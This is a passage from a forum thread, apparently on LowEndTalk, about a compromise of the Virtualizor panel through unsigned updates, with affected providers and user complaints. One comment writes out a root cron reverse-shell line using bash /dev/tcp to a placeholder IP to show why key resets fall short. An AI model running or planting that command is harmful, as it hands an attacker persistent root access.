New on LowEndTalk? Please Register and read our Community Rules.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.
Comments
We tried to do things in order, establish the real issue and email clients.
The longest part was the back and forth with Virtualizor which I understand they are very busy and may take a little time to reply, once we had a clear picture we sent out the email.
This is great, I am pretty happy to be your client
Is virtualizor is not on LET, I see no statement from them here but I think a good LET base is their customer.
Don't Naranjatech and LiteServer also use Virtualizor?
Earlier in this thread:
I’ve always wondered why so many providers use Virtualizor. I’m pretty sure whoever makes that decision has never actually used the user panel themselves — the UX is terrible and the whole panel feels clunky and outdated. Is it just cheap? Easy to set up?
Can @SolidVPS give us any info on what's going on at their side? It seems they are heavily affected.
They already answered in a relevant thread.
jesus christ
I know it's offtopic but what kind of bullshit advertising is this?
https://i.imgur.com/miGcwCF.png
You got a point. Maybe the competitors did it?
It's a mystery box/gotcha game, but for servers?
Yes, its easy to setup, it works and apparently cheaper? But I think when they started, there were not many competitors. Now we have better alternatives in terms of pricing, stability, UX. Virtualizor has really lost opportunity where they could have used their existing userbase and create something even better.
Ah, I completely overlooked. If something similar happened with other provider, they would have regularly followed up, so I thought that was shared by some vzr user.
I also have a vps with 4vps.su they are also affected.
installations that happened to check for updates while their traffic was being diverted
I'm sure it's already been asked, but how did this allow a malicious update to be deployed? Do you not sign your updates??
Using PHP is fine, but my guess is that there's no privilege separation and the the web code is running directly as root, which is a bad idea regardless of programming language.
Have you had a security audit? After an issue like this, it'd be worth getting an audit of your code and infra to figure out if there's any security issues.
Nope, they don't.
Rabisu seems also affected.
"Dear Customers / Stakeholders,
We have detected an unauthorized access (intrusion) attempt within our virtualization infrastructure. To maintain the highest level of system security and to conduct a thorough investigation, we have taken proactive measures.
As part of these measures:
• All virtual machines (VMs) have been gracefully shut down,
• Network access has been temporarily disabled.
Our expert teams have the situation under control and are continuing their detailed analysis. We will keep you updated on our progress and provide further information as soon as the root cause is identified and full system security is restored.
Thank you for your understanding and patience during this time."
In the last few days I've been getting all sorts of account reset codes popping up in my email, so it's obvious that my data got leaked by one of @virtualizor's clients again.
If it was a one-off it'd be forgivable, but they get hacked so often that I'm stunned that anyone still uses their amateurish platform.
There's always an excuse, but this has happened because they haven't been signing their updates and that tells you everything you need to know about their development practices.
I'd say Softaculous is a joke company, but there's nothing funny about how they keep getting themselves pwned and the follow-on impact on their clients and their customers from their rank incompetence.
Wondering if ColoCrossing VPSes are affected by this as well, anyone know?
At this point, even AI slop is better. And that's saying something.
Seriously, is that your best mitigation suggestion? What happened to the good old cron
as root with something like bash -i >& /dev/tcp/12.34.56.78/1234 0>&1 ?
Resetting your SSH keys / whitelisting inbound IPs won't stop it.
@Obelous, thank you for the detailed report and technical information.
We reviewed the report concerning nerat.cc and applied appropriate measures while the case was being investigated. Additional information was later reviewed, and the reported issue had been addressed before the case was closed.
The URLs, logs, hashes, and other technical indicators provided helped us review the case more efficiently.
I'm so proud of you for suspending it more than 2 weeks after the attack happened.